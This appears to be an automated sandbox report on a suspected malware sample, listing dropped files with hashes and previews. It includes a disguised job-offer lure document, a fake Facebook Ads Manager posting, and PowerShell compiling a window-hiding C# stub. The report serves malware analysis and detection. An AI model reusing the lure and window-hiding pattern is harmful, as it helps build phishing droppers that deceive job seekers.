SHA-512:	7D718B2E4599D8DD0007AF0F28848DDD377851474CEE205C53D2F4577AABC562072B968D5824F84546C453ACC557ADAC6F863B825DBB38CA0BE7776473EB1C53
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.M.X.v.R.8.h.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.9.+.w.x.J.p.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	4542
Entropy (8bit):	3.9983464701776374
Encrypted:	false
SSDEEP:	96:5Y2D8+d1X9JwL1YJ25VPtBK880tYlfCfO9HD:5tD3H7E2J2ZBB8CaCfOFD
MD5:	DA0CCB87F6FD46BC597D5147B0288484
SHA1:	9B4A0B0E3FF7A73C0DAD8CD830EE840D1DF3AB14
SHA-256:	B6294A4D5948A6FE08D565C40258D21C4F2A7559024FAE4422F8DE698347A394
SHA-512:	322BE9CCE9AEAE1C7EE4CC7744E3D1E179F5185019AF1B77299C7ECEDD321CE2B6AE923D1227B0CC88E921CF800C97DE637E48E81E8E536038DF48D8CF71B9FA
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".x.C.L.B.L.c.B.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.9.+.w.x.J.p.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{3F5329D9-715F-43E7-9B0A-DDA2EB55955F}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{823ECC80-3924-4C1E-B4E6-697830F5CAB5}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	12982
Entropy (8bit):	3.2126304772636516
Encrypted:	false
SSDEEP:	192:gTPyS7qDzkoAHbWJdYYpFqpNXr0RwsyJ8KgYuRk8wP4BdCxIxCp+:gTPySmDzk97+dvpF7ln3RqPUCxI0p+
MD5:	0C6E7E3A705A96492508CCD5105A2379
SHA1:	6A1048C10A4527C240AD045576A7D67072045284
SHA-256:	F1B026C6C31BAE5F8946D94717BF01F42213FFC3AEB59B897D00012545EFDBFE
SHA-512:	01EA855100922B8DB9770BA0910A473B028879453B6D119A2CDA0AB16923131FABE57A11B7F450FBFCB8EB8BD72C46950CC154FA8B6CCF09E5BF28587F0D02A6
Malicious:	false
Preview:	..J.o.b. .T.i.t.l.e.:. .R.e.m.o.t.e. .F.a.c.e.b.o.o.k. .A.d.s. .M.a.n.a.g.e.r. .. .M.a.n.a.g.e. .A.d. .C.a.m.p.a.i.g.n.s. .w.i.t.h. .C.o.m.p.a.n.y. .C.r.e.d.i.t. .C.a.r.d.,. .M.o.n.t.h.l.y. .B.u.d.g.e.t. .U.p. .t.o. .$.1. .M.i.l.l.i.o.n...............................................................................................................................................................................................................................................................................................................^...`.......Z...\...................n...p...................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	20051
Entropy (8bit):	5.024314565257015
Encrypted:	false
SSDEEP:	384:KiQ0HzAF1FXX359ib4DVVHWrxpUUpXoCwiopbjvwRjdvRlYfWkib45OvQJvOjJx:KinHzwbH3FVVHWrxpUUpXoCwiopbjoRd
MD5:	B5DB685AC5E98A2113E1C2A8E527EAEF
SHA1:	C537021918301E68B38AEC4FD24C4D2EE8471A87
SHA-256:	F0619199122346C9708E93301C424A8973C6274F18115E1E1DD7C3DA1C14EB0D
SHA-512:	C1946C7A30129D644B8959A0033BF6AA279C1A26EC72C349AD679AD1DD6574D6D4EA7C4BCF9D2437A37A7F33C42640DB4AFA74FADD5BA5DDFCFA1624B607EBBB
Malicious:	false
Preview:	PSMODULECACHE......wMk.z..K...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1........Clear-BitLockerAutoUnlock........Lock-BitLocker........Backup-BitLockerKeyProtector........Resume-BitLocker........Disable-BitLockerAutoUnlock....!...BackupToAAD-BitLockerKeyProtector........Add-BitLockerKeyProtector........Unlock-BitLocker........Enable-BitLockerAutoUnlock........Disable-BitLocker........Remove-BitLockerKeyProtector........Enable-BitLocker........Suspend-BitLocker........Get-BitLockerVolume........@.8o.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Get-Date........Clear-Variable........Get-EventSubscriber........Import-Csv........Get-Variable........New-Variable........Compare-Object........New-TemporaryFile........Convert-String........New-Alias........Export-Csv........Get-Event........Set-TraceSource........ConvertTo-Csv........ConvertFrom-Json........Get-PSCallStack........

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	1.0818136700495735
Encrypted:	false
SSDEEP:	3:NlllulglXlZ:NllUglX
MD5:	CA74AEC59B42377FD71F906C174D9955
SHA1:	997E9B29E0C67E411D680746FACB2E25D84F8545
SHA-256:	709899537B2BAFF2AB6EC36129404C3D354566AE6D1E89AC0920A141D2AED106
SHA-512:	974C1A506D5344FF3AFA9E436E54E5C2533C530922F6EDBFE5A98F4A8FB8E0C930B12E0D40AB69ACC6A2031D4FF8E8A807278B4CC724A10A69AB5F9C19E5B975
Malicious:	false
Preview:	@...e...............................X................@..........

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	244
Entropy (8bit):	4.952945910145069
Encrypted:	false
SSDEEP:	6:V/DssSuVY/so68SRvoSoODnso68SRaqK4Li:V/D9PY/REvoOnREfe
MD5:	6E7BC02C23E28738F9898185137720DB
SHA1:	F0450E92B0D01C2A0D23DEF93299FFD1512FAB46
SHA-256:	80A682DC3D4FEF7A23471B441BBA682648D7373DEB9889E0017E3BBBA43754E7
SHA-512:	FF24CEDAD3619B0D2379F668A06CE36A5DAFF2EBC2B11FCF8BD960C3272D99F5F77EDCA893701A6232DC9EB07794C8D2ABC3FD802CE7E5638EE87291DE1AAEFB
Malicious:	false
Preview:	.using System; using System.Runtime.InteropServices; public class Win32 { [DllImport("user32.dll")] public static extern int ShowWindow(IntPtr hWnd, int nCmdShow); [DllImport("user32.dll")] public static extern IntPtr GetForegroundWindow(); }

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.2587001884200575
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fPtGzxs7+AEszICN23fPtVyA:p37Lvkmb6Km3tGWZE73tb
MD5:	0BE5C0BD1DF87BAA5A43137571B7C5D3
SHA1:	992C97A642D0FD5ADA86270D721A6E5E872A0C95
SHA-256:	9870014B386816A4E57D7019A8AB8328E79635930DD806CF37CD4DC53175C7E9
SHA-512:	808802DFBB577595BF6AF1C0BD8E76FBAD54770E2FD998A57AEB51F952A43707A7392FE987B677D2A8EF82B4913CB270CE8AABBF9B714DA7F3A1B821B1F6B61E
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.0.cs"

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.7873365492454947
Encrypted:	false
SSDEEP:	24:etGSkWJ2JJi8R86QMBT2etkZf7uZB3+WI+ycuZhNVYakSCNPNnqI:6UNR9Z2RJ7uv3l1ulVYa3CXqI
MD5:	521E1AFF482E93D1720FF881932F686F
SHA1:	907490E737A54C7F1B3B8FA3581E3A7AE9B448EC
SHA-256:	E255FBEE7A75B9A927459A185C7FE0B239C9C0ECFC8A28C203158363C754E520
SHA-512:	4AE70960D495995BC66F2CA9DC9AF95E70BB8C1E53828E86295D592495BE2F72FA3D3A28F9C08712EB2D4EA944C906F25B1EC359A340E78FAF1FADB38FBCF95E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zwYg...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................-.&.....g.....g.......................................... 4............ ?.....P ......S.........Y.....^...S.....S...!.S.....S.......".....+.......4.......?..................................................<Module

C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
Category:	modified
Size (bytes):	872
Entropy (8bit):	5.316414106175152
Encrypted:	false
SSDEEP:	24:KSId3ka6KmRE7IKax5DqBVKVrdFAMBJTH:dkka6PRE7IK2DcVKdBJj
MD5:	DE9EBAD71A9268CDB16BCE7D97E3FC72
SHA1:	60C078C78F71C615F23AF8E9BDA593747A9CE80C
SHA-256:	C4FCAB6E4CB193F8BE840793A729C298BDEBDF5DFFA9718E526F43E40385CB25
SHA-512:	26636421A13B426FB801A80000CA2708863748FDFD52ED2BA97D7350EB56B9824FAE3814505E3C555D59090A98BBFF9297A33B4D35156EA48A706DF5E15F62DC
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0848037139068216
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryXYak7YnqqCNPN5Dlq5J:+RI+ycuZhNVYakSCNPNnqX
MD5:	4A09B7A64A12A11EC74DEE95042F71E6
SHA1:	1EE9C543879868C0732AB8E09CD5F89C5FE04D3F
SHA-256:	38944277B9CB21260EE1D7E0FA3620615B516B8A42218E91B929B3E5177EFB28
SHA-512:	E24249D214A53300C7D9F12401F366E87D8677B9B199354584307987EDD5310110EF58C68E4C44528B357F1D8AD309FD9FFF2E54FEBD3DB6660310F94325C4B7
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.0.v.0.i.4.f.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.0.v.0.i.4.f.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1733916549345456100_7179A772-9BC2-4DF6-928F-C0C31A68FE6C.log

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	ASCII text, with very long lines (28369), with CRLF line terminators
Category:	dropped
Size (bytes):	16777216
Entropy (8bit):	0.1759625936640455
Encrypted:	false
SSDEEP:	1536:S+QNzQg5hM8GAS/cAccjGwhZPcvzSxQl4B6w+9FHjLF+TEqK2qFpT6FKnjkOhZBq:XQ/fM8AfnA4KT6
MD5:	F9640EA42402D9B46720B64C954F7431
SHA1:	DE755CA78E1DEA3DC2D1853C3F57C505459D2665
SHA-256:	F368DEB8335A663CAB280D8AE4A9B9667CF5C7B7C22D2DD17171177C57A751E6
SHA-512:	E3069A3B6E2BE10A2B3575DDB6A9780459E73028DD2F2989C99E253D17B28F462594F94852835F41F2DC140AA6E1E6CE3CB4ED378D5B071477D0BFE023D6273C
Malicious:	false
Preview:	Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..12/11/2024 11:29:09.357.WINWORD (0x2280).0x23BC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":29,"Time":"2024-12-11T11:29:09.357Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 0, \"N\" : \"Microsoft.Office.Diagnostics.WerCrashDLLEnabled\", \"V\" : true, \"S\" : 11, \"P\" : 0, \"T\" : \"2024-12-11T11:29:09.1080155Z\", \"C\" : \"39\", \"Q\" : 1170.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 0, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-11T11:29:09.1080155Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 0, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2024-12-11T11:29:09.1080155Z\", \"C\" : \"33\", \"Q\" : 7.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 0, \"N\" :

C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App_1733916549346099600_7179A772-9BC2-4DF6-928F-C0C31A68FE6C.log

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16777216
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	2C7AB85A893283E98C931E9511ADD182
SHA1:	3B4417FC421CEE30A9AD0FD9319220A8DAE32DA2
SHA-256:	080ACF35A507AC9849CFCBA47DC2AD83E01B75663A516279C8B9D243B719643E
SHA-512:	7E208B53E5C541B23906EF8ED8F5E12E4F1B470FBD0D3E907B1FC0C0B8D78EB1BBFB5A77DCFD9535ACF6FA47F4AB956D188B770352C13B0AB7E0160690BAE896
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JD-Meta-Ads-Manager.pdf.docx

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Microsoft Word 2007+
Category:	dropped
Size (bytes):	4613
Entropy (8bit):	7.737727511212856
Encrypted:	false
SSDEEP:	96:MxEjTyPmOtE19oVKitqb37Xbm6HiLhOncYD8xLB83D44OXL:MghMVjtqT7Xbm62OcBxd83DJOb
MD5:	DB15D3AE0D25D001D6F1DD25DEDC408F
SHA1:	EA533B87BBD997D199565113B611C7F5A234F326
SHA-256:	32A3177BA7CF8F4F20FB8C04DE96C425BE3E5FC68D473A64ADDCC189B279767C
SHA-512:	4B229B0D27604F062EB184E38CDFCAEDB61E2B8B4F7B4A5386F3C3D82309956E183EC1746BB8BC86EA8AAB949B5181F659EA4E506329CFE60D7CD122C7AC6EFD
Malicious:	false
Preview:	PK.........~\|Y................_rels/.rels..;..0.D.bmO6P ..AHi.p...8Q.l.=.(........y...(..Y...FV:5Y...7.h.E....#...9.).#b.#..........)...9.M.+.=.O.....AS.pwA.r.j."....u...z....I....Q......W3..PK..O..<........PK.........~\|Y................word/_rels/document.xml.rels.....0.E.%..u!"M....R? &..6..T...........0yyU#......$..Z.9...9..P.y.#......$F.g.`w.z..>1.u..)...:j.8...:M7.v...4.u...I..Ex...T..4..d.jf..PM....FL.u...O...E.yD.n....+....PK..............PK.........~\|Y................word/document.xml.]_o....*...6.....Z.....>.i.@v..#..i.s.=...y.w.7.'...+....trp..........p8...Z..X'...<..O.haJ...O...N..\.\.......W?n/J#B..3.@.....8;s.....i@..5......5....ku.......K=....l.g...h.k......v.3..n/.......II....0ag...%^.r]..^...u%....O..._.^.pu9.v..&`.....tB....\Q?.v....>.w..I....\v?.Q..#..M....x..]c....yx.}....T......B(.66:Kov......n/"P...o,8......Y.[..\........Kc..U..{...,..\|...E....;..E..n.\k........[6.PJ.wmY..(.J..u(....y.=g.q.8.............B....

C:\Users\user\AppData\Local\Temp\RESD097.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Wed Dec 11 11:28:58 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	4.0000185392685355
Encrypted:	false
SSDEEP:	24:HZm90efZl6aHRwK1mNII+ycuZhNVYakSCNPNnqSSd:1ehlNaK1mu1ulVYa3CXqSC
MD5:	6687464AA053E7CFAC75B097719C03A9
SHA1:	263102F02A90DE11CE19EE5D9D6417F464D0CC9A
SHA-256:	A14F67064869D26B5A5AF4A747FEE922357208CE3DE531EA255BA7D55B41FCE2
SHA-512:	C7A08A22239DF4A88D0AD32B3D68447CA63C4E98BB52328692AF04B71BA6CC2A8A696AFE2266A2B86660774200848F9BEF6FD8764212FD569EE2568F0F364382
Malicious:	false
Preview:	L...zwYg.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP..................J...J....M../q...........5.......C:\Users\user\AppData\Local\Temp\RESD097.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.0.v.0.i.4.f.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0n1ketux.43k.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_143bnkm4.1cg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fzq4jdk.fod.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ckqjqfms.yio.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkcvtpsi.moq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dq100vau.wsu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

